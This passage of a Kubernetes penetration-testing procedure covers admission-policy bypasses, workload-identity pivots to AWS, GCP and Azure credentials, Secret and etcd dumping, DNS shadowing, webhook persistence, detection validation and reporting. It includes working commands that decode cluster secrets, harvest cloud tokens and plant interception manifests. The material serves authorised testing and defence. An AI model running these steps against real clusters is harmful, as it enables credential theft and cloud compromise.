kubectl get validatingwebhookconfigurations -o yaml | grep -A2 -E "name:|failurePolicy:|timeoutSeconds:|namespaceSelector:"

# namespaceSelector / objectSelector exemptions are common bypass primitives
# A webhook scoped to namespaceSelector: matchExpressions: [{key: kubernetes.io/metadata.name, operator: NotIn, values: [kube-system]}]
# means kube-system pods are *exempt* — adversary creates target pod in kube-system.

OPA Gatekeeper bypass

Gatekeeper compiles ConstraintTemplates into Rego policies enforced via a validating webhook. Common bypasses:

  • Constraint exemption list — the Config resource's match.excludedNamespaces list. If kube-system is excluded (default in many bundles), creating a privileged pod in kube-system (assuming create pods rights there) bypasses Gatekeeper.
  • Constraint not bound to the resource — Gatekeeper enforces only the GVKs (Group-Version-Kind) listed in match.kinds. A constraint that lists Pod does not block Deployment (the Deployment controller creates the Pod, but if the Deployment's PodSpec is the offending content, the constraint never fires on Deployments).
  • Audit-only mode — enforcementAction: dryrun or warn logs violations without blocking [verify 2026-04-27].
kubectl get config -n gatekeeper-system -o yaml      # exemption list, sync config
kubectl get constraints -A # all bound constraints
kubectl get constrainttemplates # available policy templates

Kyverno bypass

Kyverno is a CRD-native policy engine (no Rego). Common bypasses:

  • Policy validationFailureAction: audit — logs but does not block (default for some policy bundles).
  • Policy match.resources.namespaces does not list the target namespace.
  • failurePolicy: Ignore + force a webhook timeout.
kubectl get clusterpolicies                          # cluster-wide Kyverno policies
kubectl get policies -A # namespaced policies
kubectl get cpol -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.validationFailureAction}{"\n"}{end}'

T1556.005 (Modify Authentication Process: Reversible Encryption [adapted — Kubernetes admission tampering analog]), T1562 (Impair Defenses).


7. Workload Identity → Cloud Bridge

The single largest under-tested surface in modern k8s pentests. A pod's ServiceAccount, when bound to a cloud-provider IAM identity (IRSA, GKE Workload Identity, AKS Pod Identity / Entra Workload Identity), mints cloud-provider tokens on demand — reaching the cloud-provider IAM plane from inside the cluster. A SA-token compromise becomes a cloud-credential compromise.

Authorization boundary. Exercising a workload-identity binding minted from an in-scope k8s SA reaches the cloud-provider tenant as the bound IAM principal. That tenant's authorization is required separately. Coordinate with the Cloud Pentesting engagement letter; if the cloud tenant is out of scope, the engagement stops at "the SA can mint a cloud token of role X" without exercising the token.

EKS — IRSA (IAM Roles for Service Accounts)

The pod's projected SA token is signed by the cluster's OIDC issuer. The IAM role's trust policy trusts that OIDC issuer + SA subject. AWS STS AssumeRoleWithWebIdentity exchanges the SA token for AWS credentials.

# Identify IRSA bindings cluster-wide
kubectl get sa -A -o json | jq -r '.items[] | select(.metadata.annotations."eks.amazonaws.com/role-arn" != null) | "\(.metadata.namespace)/\(.metadata.name) → \(.metadata.annotations."eks.amazonaws.com/role-arn")"'

# Inside a compromised pod with SA <ns>/<sa> bound to role <role-arn>
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# Note: IRSA requires the token to have audience sts.amazonaws.com — check projected-token spec on the pod
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq .aud

aws sts assume-role-with-web-identity \
--role-arn <role-arn> \
--role-session-name pentest-session \
--web-identity-token "$TOKEN"
# Returns AccessKeyId / SecretAccessKey / SessionToken — assume the role for downstream AWS API calls

The trust policy's Condition block typically pins aud and sub (system:serviceaccount:<ns>:<sa>). Misconfigurations (a correctly pinned example follows the list):

  • Missing aud condition — any pod token (with any audience) can assume.
  • Wildcard sub condition — any SA in the cluster can assume.
  • Trust policy lists * for the OIDC provider's federated principal — any cluster federated to the same provider can assume.
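
For reference when writing the finding, the correctly pinned trust-policy shape; account ID, issuer path, and names below are placeholders, and both Condition keys must be present:

{
  "Effect": "Allow",
  "Principal": { "Federated": "arn:aws:iam::<account-id>:oidc-provider/<oidc-issuer>" },
  "Action": "sts:AssumeRoleWithWebIdentity",
  "Condition": {
    "StringEquals": {
      "<oidc-issuer>:aud": "sts.amazonaws.com",
      "<oidc-issuer>:sub": "system:serviceaccount:<ns>:<sa>"
    }
  }
}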

GKE — Workload Identity

GKE Workload Identity binds a k8s SA to a GCP IAM ServiceAccount via iam.gke.io/gcp-service-account annotation. The pod calls the GKE metadata server (metadata.google.internal), which mints a GCP access token for the bound GSA.

# Identify Workload Identity bindings
kubectl get sa -A -o json | jq -r '.items[] | select(.metadata.annotations."iam.gke.io/gcp-service-account" != null) | "\(.metadata.namespace)/\(.metadata.name) → \(.metadata.annotations."iam.gke.io/gcp-service-account")"'

# From a compromised pod (Workload Identity must be enabled on the node pool)
curl -sH "Metadata-Flavor: Google" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email'
curl -sH "Metadata-Flavor: Google" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
# Token → GCP access token for the bound GSA

GKE metadata-server hardening: nodes with Workload Identity enabled run gke-metadata-server DaemonSet that intercepts unauthorized metadata requests. Disabled-WI node pools (or specific exemption labels) leak the node's GSA token instead — often the GKE-default Compute SA with broad project rights.
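
A quick enforcement check, assuming gcloud access to the hosting project; the DaemonSet name and field paths below are the standard GKE locations:

# WI enforced on a node pool → gke-metadata-server DaemonSet present
kubectl get ds gke-metadata-server -n kube-system -o wide 2>/dev/null

# Cluster workload pool + per-node-pool metadata mode
gcloud container clusters describe <cluster> --format='value(workloadIdentityConfig.workloadPool)'
gcloud container node-pools describe <pool> --cluster <cluster> --format='value(config.workloadMetadataConfig.mode)'
# GKE_METADATA = WI-enforced; GCE_METADATA / empty = node GSA exposed to pods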

AKS — Microsoft Entra Workload Identity

AKS Workload Identity (replaces deprecated AAD Pod Identity) annotates the SA with azure.workload.identity/client-id and uses an OIDC issuer + Federated Identity Credentials on the Entra App Registration.

# Identify Workload Identity bindings
kubectl get sa -A -o json | jq -r '.items[] | select(.metadata.annotations."azure.workload.identity/client-id" != null) | "\(.metadata.namespace)/\(.metadata.name) → \(.metadata.annotations."azure.workload.identity/client-id")"'

# From a compromised pod with the WI sidecar / mutating webhook injected env vars
echo $AZURE_TENANT_ID $AZURE_CLIENT_ID $AZURE_FEDERATED_TOKEN_FILE
# The webhook injects projected token at $AZURE_FEDERATED_TOKEN_FILE; exchange for Entra token
TOKEN=$(cat $AZURE_FEDERATED_TOKEN_FILE)
az login --federated-token "$TOKEN" --service-principal -u $AZURE_CLIENT_ID -t $AZURE_TENANT_ID

Bridge findings to log

  • Over-permissive bound role / GSA / Entra app — IAM rights wider than the workload requires (e.g., a read-only S3 consumer bound to AdministratorAccess, or a single-bucket GCS reader granted Storage Admin)
  • Trust policy / federated-credential subject claim wildcards — any SA in the cluster (or any cluster federated to the same OIDC issuer) can assume
  • Default cluster SA bound — every pod in the namespace inherits the cloud rights (vs. dedicated workload SA)
  • Cluster federated to multiple cloud-tenant trusts — single cluster compromise reaches multiple cloud tenants

T1078.004 (Valid Accounts: Cloud Accounts), T1606.002 (Forge Web Credentials: SAML Tokens [adapted to OIDC web-identity flow]).


8. Secrets, etcd & KMS

Secret enumeration

# All Secrets cluster-wide (requires get secrets cluster-wide)
kubectl get secrets -A
kubectl get secrets -A -o json | jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name) (\(.type))"'

# Decode common Secret types
kubectl get secret <name> -n <ns> -o jsonpath='{.data}' | jq 'map_values(@base64d)'

# Dockerconfig (registry credentials)
kubectl get secret <name> -n <ns> -o jsonpath='{.data.\.dockerconfigjson}' | base64 -d | jq

# TLS keymat
kubectl get secret <name> -n <ns> -o jsonpath='{.data.tls\.key}' | base64 -d > /tmp/tls.key

# kubeconfig stored as Secret (frequent on cluster-of-clusters / Crossplane / Cluster API setups)
kubectl get secret <name> -n <ns> -o jsonpath='{.data.kubeconfig}' | base64 -d > /tmp/sub-cluster.kubeconfig
kubectl --kubeconfig=/tmp/sub-cluster.kubeconfig auth can-i --list

etcd direct access (self-hosted only)

Managed offerings (EKS / AKS / GKE) hide etcd. Self-hosted clusters expose etcd on TCP/2379 with mTLS. A compromised host with read access to /etc/kubernetes/pki/etcd/ (default kubeadm path) gets the etcd client cert and can dump the entire cluster state:

# From a node with etcd client certs
ETCDCTL_API=3 etcdctl \
--endpoints=https://127.0.0.1:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get / --prefix --keys-only

# Dump every Secret (etcd encryption-at-rest may apply — check apiserver --encryption-provider-config)
ETCDCTL_API=3 etcdctl ... get /registry/secrets/ --prefix --print-value-only

Encryption-provider config

# Apiserver --encryption-provider-config (self-hosted) defines whether Secrets are encrypted at rest in etcd
# If the 'identity' provider is listed BEFORE 'aescbc'/'aesgcm'/'kms', new Secret writes land in etcd unencrypted
# https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/

# Managed offerings document the equivalent:
# - EKS: KMS envelope encryption for Secrets (cluster-creation-time setting; not retrofittable without re-creation [verify 2026-04-27])
# - AKS: KMS etcd-encryption (preview / GA per-region [verify 2026-04-27])
# - GKE: Application-layer Secrets Encryption with Cloud KMS

aws eks describe-cluster --name <cluster> --query 'cluster.encryptionConfig'
az aks show -n <cluster> -g <rg> --query 'securityProfile.azureKeyVaultKms'
gcloud container clusters describe <cluster> --format='value(databaseEncryption)'

KMS-provider review

KMS-bound Secrets carry metadata.annotations referencing a KMS key. A cluster-side compromise reads only the envelope-encrypted blob from etcd; the apiserver decrypts on GET. The defender-side indicator is a sudden spike in kms:Decrypt calls attributed to the apiserver-bound IAM role — see Cloud Forensics §10.4.
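
A defender-side spot check, sketched with the AWS CLI (GNU date shown) and assuming CloudTrail lookup rights in the cluster's account:

# Recent KMS Decrypt events — grep the output for the apiserver-bound role
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=Decrypt \
  --start-time "$(date -u -d '1 hour ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --query 'Events[].{time:EventTime,who:Username}' --output table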

T1552.001 (Credentials in Files), T1555.005 (Password Stores: Password Managers [adapted to k8s Secrets store]).


9. Container Images & Supply Chain

Image registry credential surfaces

# imagePullSecrets per namespace
kubectl get sa -A -o json | jq -r '.items[] | select(.imagePullSecrets != null) | "\(.metadata.namespace)/\(.metadata.name): \(.imagePullSecrets)"'

# Decode dockerconfigjson
for s in $(kubectl get secrets -A --field-selector=type=kubernetes.io/dockerconfigjson -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name} {end}'); do
  ns=${s%/*}; name=${s#*/}
  echo "=== $ns/$name ==="
  kubectl get secret $name -n $ns -o jsonpath='{.data.\.dockerconfigjson}' | base64 -d | jq -r '.auths | keys[]'
done

# In-cluster ECR / ACR / GCR token refresh (often via a CronJob refreshing dockerconfigjson)
# Look for CronJobs that aws ecr get-login-password / az acr login / gcloud auth — and what SA they use
kubectl get cronjob -A -o yaml | grep -E "ecr|acr|gcr|registry"

Image signing (cosign / Notation)

# Is signed-image enforcement on? (Connaisseur, Kyverno verifyImages, sigstore policy-controller)
kubectl get clusterpolicies -o yaml | grep -A5 verifyImages
kubectl get crd | grep -iE "sigstore|connaisseur|policy-controller|notary|notation"

# Cosign verify (offline)
cosign verify <image>:<tag> --key <pubkey> # key-based
cosign verify <image>:<tag> --certificate-identity <id> --certificate-oidc-issuer <issuer> # keyless / Fulcio

# SBOM extraction
cosign download sbom <image>:<tag>
syft <image>:<tag> # https://github.com/anchore/syft
grype <image>:<tag> # vulnerability scan, https://github.com/anchore/grype

CI/CD pipeline access from the cluster

ArgoCD, Flux, Tekton, and Jenkins X all run inside the cluster with elevated rights — they create resources in target namespaces, hold Git repository credentials, and (in ArgoCD's case) can be configured to apply manifests from arbitrary Git URLs.

# ArgoCD
kubectl get applications,appprojects,argocds -A # CRDs (ArgoCD CRDs vary by install)
kubectl get secret -n argocd # repo creds, cluster creds, dex secrets
# Default admin password historically lived in argocd-secret.admin.password (older ArgoCD); now in argocd-initial-admin-secret one-time bootstrap [verify 2026-04-27]
kubectl get secret argocd-initial-admin-secret -n argocd -o jsonpath='{.data.password}' | base64 -d

# Flux
kubectl get gitrepositories,kustomizations,helmreleases -A
kubectl get secret -n flux-system

# Tekton
kubectl get pipelineruns,taskruns -A

# Jenkins (often deployed in-cluster)
kubectl get svc -A | grep -i jenkins

T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1525 (Implant Internal Image).


10. Cluster Network Plane

CNI policy review

NetworkPolicies are namespaced and additive — no NetworkPolicy = no restriction. CNI must support enforcement (Cilium, Calico, Weave Net do; AWS VPC CNI requires the Calico add-on for enforcement [verify 2026-04-27]; flannel does not).

# Per-namespace NetworkPolicy presence
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
  np=$(kubectl get networkpolicies -n $ns --no-headers 2>/dev/null | wc -l)
  echo "$ns: $np NetworkPolicies"
done

# Identify the CNI in use
kubectl get pods -n kube-system -l k8s-app=cilium -o name 2>/dev/null
kubectl get pods -n kube-system -l k8s-app=calico-node -o name 2>/dev/null
kubectl get pods -n kube-system -l k8s-app=weave-net -o name 2>/dev/null
kubectl get pods -n kube-system -l app=flannel -o name 2>/dev/null

# Cilium-specific (eBPF policy + L7)
kubectl get ciliumnetworkpolicies,ciliumclusterwidenetworkpolicies -A 2>/dev/null

# Default-deny check (a namespace without a default-deny is wide-open egress)
kubectl get networkpolicies -A -o yaml | grep -A3 "podSelector: {}" | head -40

In-cluster DNS abuse

CoreDNS resolves <svc>.<ns>.svc.cluster.local. A compromised identity with create services rights in a victim workload's namespace can register a Service that shadows an unqualified service-name lookup — /etc/resolv.conf search domains resolve a short name against the pod's own namespace first — and intercept traffic addressed by short name (lab sketch after the DNS snippet below).

# DNS resolution from a pod
kubectl run -it --rm dnsdebug --image=alpine --restart=Never -- sh
# / # cat /etc/resolv.conf
# / # nslookup kubernetes.default.svc.cluster.local
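
A lab-only sketch of that shadow-Service primitive: a selector-less Service plus a hand-written Endpoints object steers short-name lookups in the namespace to an attacker pod IP (names and IP hypothetical).

# LAB ONLY — shadow the unqualified name "db" inside <victim-ns>
kubectl -n <victim-ns> apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata: { name: db }            # selector-less: traffic follows the Endpoints below
spec:
  ports: [{ port: 5432 }]
---
apiVersion: v1
kind: Endpoints
metadata: { name: db }            # must match the Service name
subsets:
- addresses: [{ ip: <attacker-pod-ip> }]
  ports: [{ port: 5432 }]
EOF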

Service-mesh sidecar abuse

Istio / Linkerd inject sidecars that intercept all pod traffic. Compromised pod-injection webhook = compromised mesh.

# Istio
kubectl get crd | grep istio.io
kubectl get pods -A -l app=istiod
kubectl get authorizationpolicies,peerauthentications -A # mesh policy

# Linkerd
kubectl get crd | grep linkerd.io

NodePort / LoadBalancer / Ingress exposure

# Externally exposed Services
kubectl get svc -A --field-selector spec.type=NodePort
kubectl get svc -A --field-selector spec.type=LoadBalancer
kubectl get ingress -A
# Cross-reference with cloud-provider perimeter (NLB / ALB / Azure LB / GCP LB) — see sop-cloud-pentest §7

11. Persistence Inside the Cluster

Cluster-internal persistence outlives a pod restart, a node drain, and (often) a cluster upgrade. Each mechanism is detectable, but only if the customer's audit policy logs the relevant resource.

| Mechanism | Resource | Detection surface |
| --- | --- | --- |
| DaemonSet on every node | apps/v1 DaemonSet | apiserver audit create daemonsets |
| CronJob | batch/v1 CronJob | apiserver audit create cronjobs |
| Mutating admission webhook | admissionregistration.k8s.io/v1 MutatingWebhookConfiguration | apiserver audit create mutatingwebhookconfigurations (high-priority rule) |
| Validating admission webhook | admissionregistration.k8s.io/v1 ValidatingWebhookConfiguration | same as above |
| ValidatingAdmissionPolicy (CEL, 1.30+) | admissionregistration.k8s.io/v1 ValidatingAdmissionPolicy | apiserver audit |
| Aggregated apiserver | apiregistration.k8s.io/v1 APIService | apiserver audit create apiservices |
| Operator / controller (ClusterRole + Deployment) | composite | apiserver audit + ClusterRoleBinding watch |
| Node-level persistence (kubelet config, systemd unit, /etc/cron.d) | host-level | host EDR; outside cluster-side detection |
| Long-lived Secret of type kubernetes.io/service-account-token | Secret | apiserver audit create secrets |
| Stale system:masters group binding via aws-auth ConfigMap (EKS) | ConfigMap kube-system/aws-auth | apiserver audit update configmaps in kube-system |

Mutating webhooks are the highest-impact mechanism: a webhook with failurePolicy: Fail + a universal namespaceSelector intercepts every Pod create and can inject sidecars, environment variables, or volume mounts (e.g., a hostPath mount harvesting node credentials) into each one.
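
An illustrative shape of such a persistence object, not a drop-in payload; it assumes an attacker-controlled in-cluster Service as the webhook backend, and the broad rules block plus failurePolicy are the fields to hunt for:

apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata: { name: innocuous-sounding-injector }   # hypothetical name
webhooks:
- name: inject.example.internal
  clientConfig:
    service: { namespace: attacker-ns, name: hook-svc, path: /mutate }
  rules:
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE"]
    resources: ["pods"]                           # every pod create, every namespace
  failurePolicy: Fail                             # guarantees every create flows through the hook
  sideEffects: None
  admissionReviewVersions: ["v1"]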

# Enumerate persistence-class resources with broad scope
kubectl get mutatingwebhookconfigurations -o yaml | grep -A10 "name: " | grep -E "name:|operations:|resources:|scope:|failurePolicy:"
kubectl get apiservices # aggregated APIs
kubectl get cronjobs -A -o wide
kubectl get daemonsets -A -o wide

T1547 (Boot or Logon Autostart Execution — adapted for cluster-startup), T1543.005 (Container Service).


12. Detection Coverage Validation

Every cluster has an audit policy. The question is whether the audit log reaches a SIEM, how fast, and which verbs are logged at what level.

Audit policy review

# Self-hosted: --audit-policy-file on apiserver (typical kubeadm path /etc/kubernetes/audit/policy.yaml)
# Managed: vendor exposes a fixed policy
# - EKS: control-plane audit logs go to CloudWatch Logs when "audit" log type is enabled in describeCluster.logging
# - AKS: diagnostic settings → Log Analytics workspace, Event Hubs, or Storage
# - GKE: Cloud Audit Logs (Admin Activity is on by default; Data Access requires opt-in)

aws eks describe-cluster --name <cluster> --query 'cluster.logging'
az aks show -n <cluster> -g <rg> --query 'addonProfiles.omsagent'
gcloud logging read 'resource.type="k8s_cluster"' --limit=10

Falco / Tetragon

# Falco — DaemonSet, eBPF or kernel module probe, generates events for syscall-level rules
kubectl get pods -n falco -o wide
kubectl logs -n falco -l app.kubernetes.io/name=falco | head -50

# Tetragon (Cilium) — eBPF runtime observability
kubectl get pods -n kube-system -l app=tetragon

Coverage-validation playbook

Coordinate with the customer's SOC bridge before each test. The point is to verify that detection fires AND that alerts reach a human; in many engagements the detection logic exists but the paging path is broken or muted.

| Action | Expected detection | Where |
| --- | --- | --- |
| kubectl auth can-i --list --as=system:anonymous | Anonymous-auth audit event, plus high User-Agent: kubectl rate from non-cluster IP | apiserver audit + cloud-provider edge |
| kubectl create clusterrolebinding pentest-test --clusterrole=cluster-admin --user=test | High-severity RBAC-mutation alert | apiserver audit (create clusterrolebindings) |
| kubectl run priv-test --image=alpine --privileged | PSS-violation log; admission-controller block | audit + admission webhook log |
| kubectl exec -it <pod> -- /bin/sh (in production-tier namespace) | Production-namespace exec alert | apiserver audit (create pods/exec) |
| Pod with /var/run/docker.sock hostPath | Falco "Container Drift Detected" / "Write below /etc" | Falco + audit |
| AWS WI binding exercise (AssumeRoleWithWebIdentity) | CloudTrail AssumeRoleWithWebIdentity event from cluster IP | CloudTrail (cloud side, not cluster side) |

For full SIEM-validation methodology see Detection & Evasion Testing — that SOP is the canonical home for evasion methodology and SOC validation playbooks.


13. Common Misconfigurations Checklist

Authentication & identity

  • Anonymous auth enabled (--anonymous-auth=true on apiserver, or 200 to unauthenticated /api/v1/...)
  • Legacy long-lived ServiceAccount tokens (Secrets of type kubernetes.io/service-account-token) still in use post-1.24
  • aws-auth ConfigMap (EKS) maps non-admin IAM principals to system:masters
  • Cluster-admin kubeconfig stored in plaintext on workstations or in Git

RBAC

  • default SA in any namespace bound to cluster-admin / admin / edit
  • ClusterRoleBindings to system:authenticated or system:unauthenticated
  • Wildcards in ClusterRoles (resources: ["*"] + verbs: ["*"]) outside controllers that genuinely need them
  • escalate, bind, or impersonate verbs granted to non-admin principals
  • create pods/exec granted to namespaced roles (almost always over-permissive)

Pod security

  • Namespaces without Pod Security Standards labels (defaults to privileged)
  • Existing pods with privileged: true, hostPID, hostNetwork, hostIPC
  • Existing pods mounting hostPath: /, /var/run/docker.sock, /var/lib/kubelet, /etc, /proc, /sys
  • Pods with CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_SYS_MODULE, CAP_NET_ADMIN
  • runc < 1.1.12 / containerd < 1.7.13 / Docker Engine < 25.0.2 (CVE-2024-21626)

Admission control

  • No PSA / PodSecurityPolicy / Gatekeeper / Kyverno enforcing baseline or restricted on workload namespaces
  • Validating webhooks with failurePolicy: Ignore
  • Mutating webhooks with namespaceSelector exempting kube-system (then attacker uses kube-system)
  • Gatekeeper Config excludedNamespaces over-broad

Workload identity

  • IRSA / WI / Pod Identity bound role wider than the workload requires
  • OIDC trust-policy missing aud or sub Condition
  • Multiple clusters federated to the same OIDC issuer with overlapping trust
  • Default cluster SA bound to a cloud-provider role (every pod inherits)

Secrets & etcd

  • Apiserver --encryption-provider-config lists identity first (no encryption)
  • Self-hosted etcd reachable from worker nodes (lateral movement to etcd from a compromised node)
  • Secrets containing kubeconfigs, cloud credentials, registry creds with no rotation evidence

Networking

  • CNI does not enforce NetworkPolicy (flannel, AWS VPC CNI without Calico add-on)
  • No default-deny NetworkPolicy in workload namespaces
  • Public NodePort / LoadBalancer Services for internal-only workloads
  • Ingress controller exposes /metrics, /actuator, or admin endpoints unauthenticated

Supply chain

  • No image-signing enforcement (Connaisseur / Kyverno verifyImages / sigstore policy-controller absent)
  • imagePullPolicy: Always not enforced (mutable tags can be repointed)
  • ArgoCD admin password is bootstrap default, or argocd-server exposed publicly
  • Helm chart repos / OCI registries unauthenticated

Detection

  • EKS / AKS / GKE control-plane audit logs not enabled in describeCluster.logging / diagnosticSettings / cloud logging
  • No Falco / Tetragon / GuardDuty EKS Audit Log / Defender for Containers / GKE Security Posture
  • Audit policy at Metadata level only — request bodies missing, so no RBAC-mutate forensics (policy excerpt below)
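
A minimal audit-policy excerpt showing the level distinction the last bullet refers to, sketched for a self-hosted apiserver (--audit-policy-file); managed offerings fix their own policy:

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# RBAC mutations: capture full request + response bodies for forensics
- level: RequestResponse
  verbs: ["create", "update", "patch", "delete"]
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
# Everything else: who did what, no bodies
- level: Metadata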

14. Evidence Collection

/Evidence/{engagement_id}/k8s/
├── recon/
│   ├── 20260427_kubectl-version.json
│   ├── 20260427_api-resources.txt
│   ├── 20260427_nodes-wide.txt
│   └── 20260427_namespaces-pss-labels.txt
├── rbac/
│   ├── 20260427_clusterroles.baseline.yaml
│   ├── 20260427_clusterrolebindings.baseline.yaml
│   ├── 20260427_roles-all.baseline.yaml
│   ├── 20260427_rolebindings-all.baseline.yaml
│   ├── 20260427_serviceaccounts.baseline.yaml
│   ├── 20260427_kubiscan-risky-roles.txt
│   └── 20260427_can-i-list-as-default-sa.txt
├── pod-security/
│   ├── 20260427_pods-with-hostpath.json
│   ├── 20260427_pods-with-priv-or-hostpid.json
│   └── 20260427_pods-with-dangerous-caps.json
├── admission/
│   ├── 20260427_validatingwebhooks.yaml
│   ├── 20260427_mutatingwebhooks.yaml
│   ├── 20260427_gatekeeper-config.yaml
│   └── 20260427_kyverno-policies.yaml
├── workload-identity/
│   ├── 20260427_irsa-bindings.txt
│   ├── 20260427_gke-wi-bindings.txt
│   └── 20260427_aks-wi-bindings.txt
├── secrets/
│   └── 20260427_secrets-inventory-by-type.txt   # types only — never raw secret material
└── audit-evidence/
    ├── 20260427_apiserver-audit-event-ids.txt   # for each test command
    └── 20260427_screenshots/

# Hash every artifact at engagement close
sha256sum * > evidence_hashes.txt

Per-action audit-event ID capture is what lets the customer correlate test activity in their SIEM. Without it, defenders cannot reproduce the timeline. Pattern per Collection Log.

For tokens harvested during testing (legacy SA tokens, bound projected tokens, IRSA / WI tokens, kubeconfigs): encrypt at rest, log who accessed them, schedule destruction in the engagement letter. Tokens are replayable identity material until they expire (1h default for bound tokens; legacy tokens never expire until revoked).
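
A minimal at-rest sealing sketch, assuming GnuPG on the jump host and a per-engagement key; the directory and recipient names are hypothetical:

# Hash, seal, destroy — plaintext token material never persists past sealing
sha256sum harvested-tokens/* >> evidence_hashes.txt
tar -czf - harvested-tokens/ | gpg --encrypt --recipient <engagement-key-id> > harvested-tokens.tar.gz.gpg
shred -u harvested-tokens/*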


15. Reporting

Finding Format

**Title:** <Cluster> · <Layer> · <Issue> — e.g. "prod-eks-1 · RBAC · default SA in namespace `app` bound to cluster-admin"
**Severity:** Critical / High / Medium / Low / Info
**Cluster:** <name> (<endpoint-host>, <region>)
**Namespace(s):** <list> or "Cluster-wide"
**Affected Resources:** <Kind/Namespace/Name list>
**Description:** <what the misconfiguration is, in cluster-neutral terms where possible>
**Attack Path:** <step-by-step, named primitives, no production-data screenshots>
**Impact:** <data confidentiality / integrity / availability + blast radius — pod / namespace / cluster / cloud-provider tenant>
**Evidence:** <apiserver audit event IDs, UTC timestamps, SHA-256 of captured manifests>
**Remediation:** <RBAC change, NetworkPolicy, PSA label, admission policy manifest snippet preferred>
**References:** <CIS Kubernetes Benchmark control / NSA-CISA Hardening section / k8s docs URL>

Remediation Priority

  1. Cluster-admin / system:masters paths from low-privilege SA (Critical — fix in hours)
  2. Pod-escape primitives in production namespaces (Critical — privileged/hostPath/hostPID + multi-tenant nodes)
  3. Workload-identity binding to over-permissive cloud role (Critical — bridge to cloud-tenant compromise)
  4. Apiserver audit logging disabled or not reaching SIEM (High — without logs, no IR)
  5. Admission-controller bypass paths (High — PSS unenforced, webhook Ignore-policy on security-critical webhooks)
  6. Etcd encryption-at-rest disabled (identity provider listed first) (High — every Secret in plaintext at rest)
  7. CNI without NetworkPolicy enforcement OR no default-deny (High — east-west wide-open)
  8. Image-signing not enforced (Medium-High depending on image-pull surface)
  9. Long-lived legacy SA tokens still in use post-1.24 (Medium — token rotation gap)
  10. Documentation / labeling drift, missing PSA labels on system namespaces (Low-Info)

16. Tools Reference

| Tool | Purpose | Link |
| --- | --- | --- |
| kubectl + kubectl auth can-i | Apiserver client + RBAC self-check | kubernetes.io/docs/reference/kubectl |
| krew | kubectl plugin manager | krew.sigs.k8s.io |
| peirates | Post-exploit toolkit (RBAC abuse, escape primitives) | github.com/inguardians/peirates |
| kube-hunter | Active + passive cluster discovery / vuln scan (Aqua) | github.com/aquasecurity/kube-hunter |
| kubeaudit | Manifest + cluster security audit | github.com/Shopify/kubeaudit |
| kube-bench | CIS Kubernetes Benchmark check (Aqua) | github.com/aquasecurity/kube-bench |
| Kubescape | Security posture + risk score (ARMO, CNCF Sandbox [verify 2026-04-27]) | github.com/kubescape/kubescape |
| KubiScan | RBAC risk scanner (CyberArk) | github.com/cyberark/KubiScan |
| rbac-tool | RBAC analysis + visualization | github.com/alcideio/rbac-tool |
| rbac-lookup | Inverse-RBAC query (FairwindsOps) | github.com/FairwindsOps/rbac-lookup |
| Polaris | Manifest validation + RBAC checks (FairwindsOps) | github.com/FairwindsOps/polaris |
| Popeye | Cluster sanitizer (resource hygiene) | github.com/derailed/popeye |
| amicontained | Identify container runtime + capability set | github.com/genuinetools/amicontained |
| deepce | Docker container enumeration + escape primitives | github.com/stealthcopter/deepce |
| CDK | Container penetration toolkit / escape PoC collection | github.com/cdk-team/CDK [verify 2026-04-27] |
| Bad Pods (Bishop Fox) | Eight escape-recipe pod manifests | github.com/BishopFox/badPods |
| OPA Gatekeeper | Admission policy engine (CNCF) | open-policy-agent.github.io/gatekeeper |
| Kyverno | CRD-native admission policy engine | kyverno.io |
| Falco | Runtime threat detection (CNCF) | falco.org |
| Tetragon | eBPF runtime observability (Cilium / Isovalent) | tetragon.io |
| sigstore cosign | Container image signing (sigstore) | github.com/sigstore/cosign |
| Notation | OCI artifact signing (CNCF, Notary v2) | github.com/notaryproject/notation |
| Syft / Grype | SBOM + vuln scan (Anchore) | github.com/anchore/syft |
| Trivy | All-in-one cluster + image + IaC scanner (Aqua) | github.com/aquasecurity/trivy |
| KubeStriker | Kubernetes security audit + attack-surface analyzer | github.com/vchinnipilli/kubestriker [verify 2026-04-27] |
| Steampipe (k8s + helm plugins) | SQL over cluster / Helm-release state | steampipe.io/plugins/turbot/kubernetes |
| Cartography | Multi-cloud + k8s asset graph (CNCF Sandbox) | github.com/cartography-cncf/cartography |

17. Reference Resources

Comprehensive Knowledge Bases

Hardening & Benchmarks

Attack Research

CSP-Specific Managed-K8s Documentation

Practice Platforms

Certifications

  • CKS — Certified Kubernetes Security Specialist (CNCF + Linux Foundation) — practical exam covering hardening, runtime, supply-chain
  • OSCP / OSCE / OSEP (Offensive Security) — adjacent; container modules in newer revisions

18. Common Pitfalls

  • ❌ Running kubectl create clusterrolebinding / apply -f bad-pod.yaml without explicit named-resource authorization in the RoE
  • ❌ Treating kubectl auth can-i --list as harmless — it does not mutate, but it generates apiserver audit volume that triggers RBAC-recon detection rules
  • ❌ Skipping the cluster fingerprint (k8s version, CNI, CRI, admission stack) — escape-primitive feasibility depends entirely on the fingerprint
  • ❌ Detonating runc / containerd / CRI-O escape PoCs against production runtimes without a version-matched lab rehearsal first
  • ❌ Reporting "RBAC over-permissive" without naming the specific verb-resource pair and the path it enables
  • ❌ Pivoting a workload-identity binding to the cloud-provider tenant without that tenant's separate written authorization
  • ❌ Enumerating other tenants' namespaces in a multi-tenant cluster without scope authorization
  • ❌ Mixing customer evidence into the operator's personal cluster — use a dedicated engagement evidence bucket / storage
  • ❌ Reporting findings without apiserver audit-event IDs — defenders cannot reproduce; finding looks fabricated
